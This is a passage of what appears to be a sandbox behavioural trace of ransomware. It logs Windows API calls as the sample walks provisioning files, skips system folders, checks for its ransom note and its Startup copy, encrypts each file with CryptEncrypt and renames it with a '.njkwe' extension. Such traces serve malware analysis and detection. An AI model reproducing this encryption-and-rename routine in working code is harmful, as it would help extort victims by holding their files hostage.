GetProcessHeap () returned 0xbe0000 [0078.156] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.156] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0078.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\306__connections_cellular_claro (nicaragua)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\306__Connections_Cellular_Claro (Nicaragua)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\306__connections_cellular_claro (nicaragua)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.157] GetProcessHeap () returned 0xbe0000 [0078.157] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.157] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b5f2b1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b5f2b1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b5f2b1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", cAlternateFileName="307__C~1.PRO")) returned 1 [0078.157] lstrcmpiW (lpString1="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.157] lstrcmpiW (lpString1="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.157] lstrcmpiW (lpString1="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.157] lstrcmpiW (lpString1="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.157] lstrcmpiW (lpString1="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.157] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml") returned 161 [0078.157] StrStrIW (lpFirst="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.157] lstrcmpW (lpString1="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.157] lstrcmpW (lpString1="307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.157] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\307__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.157] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\307__connections_cellular_claro (nicaragua)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.157] GetTickCount () returned 0x1153df0 [0078.157] GetTickCount () returned 0x1153df0 [0078.157] GetTickCount () returned 0x1153df0 [0078.158] GetTickCount () returned 0x1153df0 [0078.158] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.158] GetProcessHeap () returned 0xbe0000 [0078.158] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.158] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x307, lpOverlapped=0x0) returned 1 [0078.159] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.159] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x307, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x307, lpOverlapped=0x0) returned 1 [0078.159] GetProcessHeap () returned 0xbe0000 [0078.159] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.159] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.159] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.159] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.159] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.160] CloseHandle (hObject=0x43c) returned 1 [0078.160] GetProcessHeap () returned 0xbe0000 [0078.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.160] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0078.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\307__connections_cellular_claro (nicaragua)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\307__Connections_Cellular_Claro (Nicaragua)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\307__connections_cellular_claro (nicaragua)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.160] GetProcessHeap () returned 0xbe0000 [0078.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.161] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b5f2b1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b5f2b1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b5f2b1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x322, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", cAlternateFileName="308__C~1.PRO")) returned 1 [0078.161] lstrcmpiW (lpString1="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.161] lstrcmpiW (lpString1="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.161] lstrcmpiW (lpString1="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.161] lstrcmpiW (lpString1="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.161] lstrcmpiW (lpString1="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.161] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml") returned 166 [0078.161] StrStrIW (lpFirst="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.161] lstrcmpW (lpString1="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.161] lstrcmpW (lpString1="308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.161] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\308__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.161] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\308__connections_cellular_telefonica (nicaragua)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.161] GetTickCount () returned 0x1153df0 [0078.161] GetTickCount () returned 0x1153df0 [0078.161] GetTickCount () returned 0x1153df0 [0078.161] GetTickCount () returned 0x1153df0 [0078.161] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.161] GetProcessHeap () returned 0xbe0000 [0078.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.161] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x322, lpOverlapped=0x0) returned 1 [0078.187] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcde, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.187] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x322, lpOverlapped=0x0) returned 1 [0078.187] GetProcessHeap () returned 0xbe0000 [0078.187] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.187] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.187] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.187] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.187] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.187] CloseHandle (hObject=0x43c) returned 1 [0078.187] GetProcessHeap () returned 0xbe0000 [0078.187] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.187] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\308__connections_cellular_telefonica (nicaragua)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\308__Connections_Cellular_Telefonica (Nicaragua)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\308__connections_cellular_telefonica (nicaragua)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.191] GetProcessHeap () returned 0xbe0000 [0078.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.192] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b85519, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b85519, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b85519, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="309__C~1.PRO")) returned 1 [0078.192] lstrcmpiW (lpString1="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.192] lstrcmpiW (lpString1="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.192] lstrcmpiW (lpString1="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.192] lstrcmpiW (lpString1="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.192] lstrcmpiW (lpString1="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.192] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml") returned 157 [0078.192] StrStrIW (lpFirst="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.192] lstrcmpW (lpString1="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.192] lstrcmpW (lpString1="309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.192] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\309__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.192] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\309__connections_cellular_mtn (nigeria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.192] GetTickCount () returned 0x1153e0f [0078.192] GetTickCount () returned 0x1153e0f [0078.192] GetTickCount () returned 0x1153e0f [0078.192] GetTickCount () returned 0x1153e0f [0078.192] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.193] GetProcessHeap () returned 0xbe0000 [0078.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.193] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0078.194] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.194] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0078.194] GetProcessHeap () returned 0xbe0000 [0078.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.194] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.194] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.194] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.194] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.194] CloseHandle (hObject=0x43c) returned 1 [0078.195] GetProcessHeap () returned 0xbe0000 [0078.195] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.195] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0078.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\309__connections_cellular_mtn (nigeria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\309__Connections_Cellular_MTN (Nigeria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\309__connections_cellular_mtn (nigeria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.195] GetProcessHeap () returned 0xbe0000 [0078.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.195] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901af563, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901af563, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901af563, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="30__CO~1.PRO")) returned 1 [0078.195] lstrcmpiW (lpString1="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.196] lstrcmpiW (lpString1="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.196] lstrcmpiW (lpString1="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.196] lstrcmpiW (lpString1="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.196] lstrcmpiW (lpString1="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.196] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml") returned 169 [0078.196] StrStrIW (lpFirst="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.196] lstrcmpW (lpString1="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.196] lstrcmpW (lpString1="30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.196] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\30__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.196] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\30__Connections_Cellular_T-Mobile Austria (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\30__connections_cellular_t-mobile austria (austria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.196] GetTickCount () returned 0x1153e0f [0078.196] GetTickCount () returned 0x1153e0f [0078.196] GetTickCount () returned 0x1153e0f [0078.196] GetTickCount () returned 0x1153e0f [0078.196] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.196] GetProcessHeap () returned 0xbe0000 [0078.196] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.196] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x35b, lpOverlapped=0x0) returned 1 [0078.198] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.198] WriteFile (in: hFile=0x43c, 